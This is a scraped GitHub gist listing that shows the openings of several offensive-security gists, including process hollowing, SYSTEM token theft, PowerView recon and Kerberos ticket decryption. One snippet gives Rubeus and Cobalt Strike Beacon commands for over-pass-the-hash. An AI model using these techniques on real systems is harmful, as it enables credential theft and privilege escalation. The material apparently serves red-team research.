EspressoCake
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "syscall" | |
| ) | |
| const filePath = "data.dat" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
WhisperingChaos
/ ngnix.conf
Last active
November 12, 2022 21:42
NGINX SSL/TLS Reverse Proxy to Upstream SSL servers.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| events { | |
| # nginx requires this section even when applying all default values | |
| } | |
| http { | |
| # Upstream keyword is followed by a url (domain name/IP). This reference encapsulates | |
| # the list of backend servers defined for a virtual proxy. When autnenticating | |
| # a certificate from a backend server, the upstream url is supplied to the | |
| # certificate authentication process instead of the backend server name. See | |
| # the comments associated with proxy_pass below for a detailed discussion. |
masthoon
/ SystemCMD.cpp
Last active
October 3, 2024 18:16
Launch SYSTEM CMD in user current session (from a service)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include <windows.h> | |
| #include <Winbase.h> | |
| #include <Wtsapi32.h> | |
| #include <Userenv.h> | |
| #include <malloc.h> | |
| #pragma comment(lib, "Wtsapi32.lib") | |
| #pragma comment(lib, "Userenv.lib") |
xpn
/ getsystem_parent.cpp
Created
November 20, 2017 00:11
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) { | |
| TOKEN_PRIVILEGES tp; | |
| LUID luid; | |
| TOKEN_PRIVILEGES tpPrevious; | |
| DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES); | |
| if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*************** | |
| * Simple Process Hollowing in C# | |
| * | |
| * #Build Your Binaries | |
| * c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
| * | |
| * @author: Michael Gorelik <[email protected]> | |
| * gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
| * #Most of the code taken from here: @github: github.com/ambray |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Most of this taken from https://stackoverflow.com/a/19780129 with some edits. | |
| #ifndef _WIN32_WINNT | |
| // Windows XP | |
| #define _WIN32_WINNT 0x0501 | |
| #endif | |
| #define MAX_PATH 0xFF | |
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <iostream> |
NaniteFactory
/ dllmain.go
Last active
February 21, 2025 23:33
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| //#include "dllmain.h" | |
| import "C" |
HarmJ0y
/ gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active
September 29, 2024 12:57
Over-pass-the-hash with Rubeus and Beacon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##### IF ELEVATED: | |
| # grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
| beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
| # decode the base64 blob to a binary .kirbi | |
| $ base64 -d ticket.b64 > ticket.kirbi | |
| # sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
| beacon> make_token DOMAIN\USER PassWordDoesntMatter |
xan7r
/ decryptKerbTicket.py
Last active
March 31, 2025 11:22
Decrypt kerberos tickets and parse out authorization data
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # NOTE: this script was created for educational purposes to assist learning about kerberos tickets. | |
| # Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets. | |
| # | |
| # Recommended Instructions: | |
| # Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export" | |
| # Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>" | |
| # Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket) | |
| # Run this script to decrypt: | |
| # ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected] |
OlderNewer